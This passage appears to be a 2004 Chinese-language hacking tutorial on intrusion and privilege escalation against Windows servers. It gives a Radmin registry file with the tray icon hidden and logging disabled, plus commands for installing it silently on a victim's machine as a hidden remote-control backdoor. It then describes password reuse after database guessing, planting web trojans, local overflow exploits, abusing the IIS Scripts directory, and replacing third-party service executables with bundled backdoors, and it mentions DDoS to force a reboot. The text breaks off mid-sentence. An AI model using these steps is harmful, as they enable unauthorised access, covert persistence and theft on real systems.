小心系統入侵之八招吸星大法！

　　我們平常所用的遠程共用一個桌面的服務軟件有DameWare NT ,VNC , Pcanywhere , Remote administrator 等。 DameWare 我感覺已經被淘汰了， 它的缺點太多，例如要依賴IPC＄，日志記錄等等。Pcanywhere 我沒有研究過。VNC 最大的特點是跨平台，但缺點是隱藏圖標的問題，我不會編程，當然無法去除圖標，還有就是 VNC 功能很少。radmin 就不同了，它的特色有：速度快隱藏圖標，COPY文件，telnet 等功能。安裝也及其簡單： 　　首先要在自己修改注冊表............ 　　HKEY_LOCAL_MACHINE\SYSTEM\RAdmin 起名為radmin.reg 　 　　內容大概如下： 　　Windows Registry Editor Version 5.00 　　[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin] 　　[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0] 　　[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server] 　　[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist] 　　[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] 　　"Port"=hex:64,19,00,00 　　"Timeout"=hex:0a,00,00,00 　　"EnableLogFile"=hex:00,00,00,00 　　"LogFilePath"="c:\\logfile.txt" 　　"FilterIp"=hex:00,00,00,00 　　"DisableTrayIcon"=hex:01,00,00,00 　　"AutoAllow"=hex:00,00,00,00 　　"AskUser"=hex:00,00,00,00 　　"EnableEventLog"=hex:00,00,00,00 　　"NTAuthEnabled"=hex:00,00,00,00 　　"Parameter"=hex:c7,04,0d,72,74,b5,cb,03,f6,46,8e,ee,64,52,72,7b 　　解釋一下 "DisableTrayIcon"=hex:01,00,00,00 裡的01表示隱藏圖標，改成00，圖標就會顯示 。"Port"=hex:當然是端口，這裡是6500。 "Parameter"=hex:是密碼。 　　其他的就不用管了。 　　現在我們將 　　AdmDll.dll 　　raddrv.dll 　　r_server.exe 　　radmin.reg 　　復制到對方的c:\winnt\system32下。 　　然後在對方機器上運行： 　　regedit /s radmin.reg 　　r_server /install /silence 　　net start r_server
　　馬上連接即可，速度還不錯。並且它還自帶了ftp和telnet，在實際中有很大用處。 Mon, 02 Aug 2004 23:21:00 GMT #feedback 0 ?ID=13024 　　現在的入侵是越來越難了，人們的安全意識都普遍提高了不少，連個人用戶都懂得防火牆，殺毒軟件要裝備在手，對於微軟的補丁升級也不再是不加問津。因此現在我們想在因特網上掃描弱口令的主機已經幾乎是癡心妄想了。（這可是一件大大的好事啊。） 　　但是這也使得我們作黑客的進行入侵檢測達到了一個前所未有的難度。通過各種手段，我們通常並不能直接獲得一個系統的管理員權限。比如我們通過某些對IIS的攻擊，只能獲得IUSR-MACHINENAME的權限（如上傳asp木馬，以及某些溢出等）。這個帳號通常可是系統默認的guest權限，於是，如何拿到系統管理員或者是system權限，便顯得日益重要了。 　　於是，我就總結了一下大家所經常使用的幾種提升權限的方法，以下內容是我整理的，沒有什麼新的方法，寫給和我一樣的菜鳥看的。高手們就可以略去了，當然，你要復習我不反對，順便幫我查查有什麼補充與修改： 　　1、社會工程學。 　　對於社會工程學，我想大家一定不會陌生吧？（如果你還不太明白這個名詞的話，建議你去找一些相關資料查查看。）我們通常是通過各種辦法獲得目標的敏感信息，然後加以分析，從而可以推斷出對方admin的密碼。舉一個例子：假如我們是通過對服務器進行數據庫猜解從而得到admin在網站上的密碼，然後借此上傳了一個海洋頂端木馬，你會怎麼做？先翻箱倒櫃察看asp文件的代碼以希望察看到連接SQL的帳號密碼？錯錯錯，我們應該先鍵入一個netstat –an命令察看他開的端口（當然用net start命令察看服務也行）。一旦發現他開了3389，猶豫什麼？馬上拿出你的終端連接器，添上對方IP，鍵入你在他網站上所獲得的用戶名及密碼……幾秒之後，呵呵，進去了吧？這是因為根據社會工程學的原理，通常人們為了記憶方便，將自己在多處的用戶名與密碼都是用同樣的。於是，我們獲得了他在網站上的管理員密碼，也就等同於獲得了他所有的密碼。其中就包括系統admin密碼。於是我們就可以借此登入他的3389拉！ 　　即使他並沒有開啟3389服務，我們也可以憑借這個密碼到他的FTP服務器上試試，如果他的FTP服務器是serv-u 5.004 以下版本，而帳號又具有寫權限，那麼我們就可以進行溢出攻擊了！這可是可以直接拿到system權限的哦！（利用serv-u還有兩個提升權限的方法，我待會兒會說的） 　　實在不行，我們也可以拿它的帳號去各大網站試試！或許就能進入他所申請的郵箱拿到不少有用的信息！可以用來配合我們以後的行動。 　　還有一種思路，我們知道，一個網站的網管通常會將自己的主頁設為IE打開後的默認主頁，以便於管理。我們就可以利用這一點，將他自己的主頁植上網頁木馬……然後等他打開IE……呵呵，他怎麼也不會想到自己的主頁會給自己種上木馬吧？ 　　其實利用社會工程學有很多種方法，想作為一個合格黑客，這可是必學的哦！多動動你自己的腦子，你才會成功！ 　　2、本地溢出。 　　微軟實在是太可愛了，這句話也不知是哪位仁兄說的，真是不假，時不時地就會給我們送來一些溢出漏洞，相信通過最近的MS-0011大家一定又賺了一把肉雞吧？其實我們在拿到了Guest權限的shell後同樣可以用溢出提升權限。最常用的就是RunAs.exe、 winwmiex.exe 或是PipeUpAdmin等等。上傳執行後就可以得到Admin權限。但一定是對方沒有打過補丁的情況下才行，不過最近微軟的漏洞一個接一個，本地提升權限的exploit也會出來的，所以大家要多多關心漏洞信息，或許下一個exploit就是你寫出來的哦！
　　3、利用scripts目錄的可執行權限。 　　這也是我們以前得到webshell後經常使用的一招，原理是Scripts目錄是IIS下的可運行目錄，權限就是我們夢寐以求的SYSTEM權限。常見的使用方法就是在U漏洞時代我們先上傳idq.dll到IIS主目錄下的Scripts目錄，然後用ispc.exe進行連接，就可以拿到system權限，不過這個是在Microsoft出了SP3之後就行不通了，其實我們仍可以利用此目錄，只要我們上傳別的木馬到此目錄，我舉個例子就比如是winshell好了。然後我們在IE中輸入： 　　木馬文件名.exe 　　等一會，看到下面進度條顯示“完成”時，可以了，連接你設定的端口吧！我這裡是默認的5277，連接好後就是SYSTEM權限了！這時你要干什麼我就管不著了……嘿嘿 　　4、替換系統服務。 　　這可是廣大黑友樂此不疲的一招。因為windows允許對正在運行中的程序進行改動，所以我們就可以替換他的服務以使得系統在重啟後自動運行我們的後門或是木馬！首先，通過你獲得的guest權限的shell輸入：net start命令，察看他所運行的服務。此時如果你對windows的系統服務熟悉的話，可以很快看出哪些服務我們可以利用。 　　C:\WINNT\System32\>net start 　　已經啟動以下 Windows 服務: COM Event System 　　Cryptographic Services 　　DHCP Client 　　Distributed Link Tracking Client 　　DNS Client 　　Event Log 　　Help and Support 　　IPSEC Services 　　Logical Disk Manager 　　Logical Disk Manager Administrative Servic 　　Network Connections 　　Network Location Awareness (NLA) 　　Protected Storage 　　Remote Procedure Call (RPC) 　　Rising Process Communication Center 　　Rising Realtime Monitor Service 　　Secondary Logon
　　Security Accounts Manager 　　Shell Hardware Detection 　　System Event Notification 　　System Restore Service 　　Telephony 　　Themes 　　Upload Manager 　　WebClient 　　Windows Audio 　　Windows Image Acquisition (WIA) 　　Windows Management Instrumentation 　　Windows Time 　　Wireless Zero Configuration 　　Workstation 　　命令成功完成。 　　我先在我的機器上運行一下命令做個示范（大家別黑我呀），注意我用紅色標注的部分，那是我安裝的瑞星。Rising Process Communication Center服務所調用的是CCenter.exe，而Rising Realtime Monitor Service服務調用的是RavMonD.exe。這些都是第三方服務，可以利用。（強烈推薦替換第三方服務，而不要亂動系統服務，否則會造成系統不穩定）於是我們搜索這兩個文件，發現他們在D:\ rising\rav\文件夾中，此時注意一點：如果此文件是在系統盤的Program Files目錄中時，我們要知道，如果對方是使用的NTFS格式的硬盤，那麼系統盤下的這個文件夾guest權限是默認不可寫的，還有Windows目錄、Documents and Settings目錄這些都是不可寫的，所以我們就不能替換文件，只能令謀途徑了。（這也是為什麼我不建議替換系統服務的原因之一，因為系統服務文件都在Windows\System32目錄中，不可寫）但如果是FAT32格式就不用擔心，由於它的先天不足，所有文件夾都是可寫的。 　　於是就有人會問：如果是NTFS格式難道我們就沒轍了嗎？ 　　當然不是，NTFS格式默認情況下除了對那三個文件夾有限制外，其余的文件夾、分區都是everyone完全控制。（也就是說我即使是IPC＄的匿名連接，都會對這些地方有可寫可運行權限！）所以一旦對方的第三方服務不是安裝在那三個文件夾中，我們就可以替換了！我就拿CCenter下手，先將它下載到本地機器上（FTP、放到IIS主目錄中再下載等等……）然後拿出你的文件捆綁機，找到一個你最拿手的後門……呵呵，捆綁好後，上傳，先將對方的CCenter.exe文件改個名CCENTBAK.exe，然後替換成自己的CCenter。現在只需要等對方的機器重啟，我們的後門就可以運行了！由於Windows系統的不穩定，主機在一個禮拜後就會重啟，（當然如果你等不及的話，可以對此服務器進行DDOS攻擊迫使他重啟，但我並不贊同！）此時登上你的後門，就是System權限了！
　　5、替換admin常用程序。 　　如果對方沒有你所能利用的服務，也可以替換對方管理員常用的程序，例如QQ，MSN等等，具體替換方法與替換服